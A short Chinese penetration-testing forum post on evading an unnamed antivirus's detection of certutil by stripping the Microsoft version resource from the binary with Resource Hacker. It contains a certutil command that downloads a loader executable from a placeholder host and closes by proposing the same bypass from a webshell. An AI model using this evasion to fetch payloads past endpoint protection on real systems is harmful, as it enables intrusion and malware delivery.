分析某杀软规则库绕过certutil免杀实践
蓝*澪 发表于 广西 渗透测试 625浏览 · 2024-10-16 07:12

一、Certutil在某杀软环境下利用
certutil下载文件的常见命令:

certutil -urlcache -split -f http://xxxxx/loader.exe

可想而知,在该杀软环境下是必定拦截的,下面我将分析其内存中存在规则进行绕过。

二、探究certutil免杀分析其规则库
首先打开火绒剑或者其他工具找到该杀软进程,搜索certutil.exe内存字符串。

|IN=CertUtil.exe|CN@=Microsoft Corporation|LOLBin=none|

从上一步中找到类似规则字符,但我们不知道字符含义,所以我们要根据其字符去内存中寻找其代表的意思。


经过整理,对照文本中的信息,我们就知道其规则的含义是什么意思:

IN=InternalName(内部名)
CN=公司名
LOLBin=白利用拦截


三、绕过规则检测免杀certutil
规则的含义中CertUtil.exe名字我们可以随意更改,LOLBin=none可以忽略,关键点就在于Microsoft Corporation中。Microsoft Corporation存在资源文件中,那我们是不是更改或者删除相关资源文件即可绕过。

把CertUtil.exe使用Resource_Hacker打开,删除版本信息。

删除后保存为新的CertUtil.exe,在杀软环境下使用certutil下载文件的常见命令

从上图实验来看,删除了Microsoft Corporation资源,杀软的规则就对比不上,我们成功绕过其检测。

四、针对其规则的拓展及思考
在webshell情况下,我们是否可以根据其规则,来绕过该杀软去执行本来无法执行的相关敏感命令呢?针对性绕过

1 条评论
某人
表情
可输入 255
目录